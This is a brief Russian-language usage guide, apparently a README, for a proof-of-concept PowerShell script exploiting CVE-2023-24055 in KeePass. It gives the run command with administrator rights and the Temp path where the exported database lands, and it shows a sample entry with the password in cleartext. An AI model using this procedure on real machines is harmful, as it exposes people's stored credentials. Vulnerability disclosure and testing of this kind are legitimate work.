
Измените переменную $User в скрипте и замените значение на ваше имя пользователя.
Откройте PowerShell от имени администратора и выполните скрипт:
./PoC_CVE-2023-24055.ps1
После выполнения скрипта откройте KeePass.
Результат сохраняется в "C:\Users\your_username\AppData\Local\Temp\output.xml"
Пароль хранится в открытом виде в:
<String>
<Key>Password</Key>
<Value ProtectInMemory="True">ExempePassword</Value>
</String>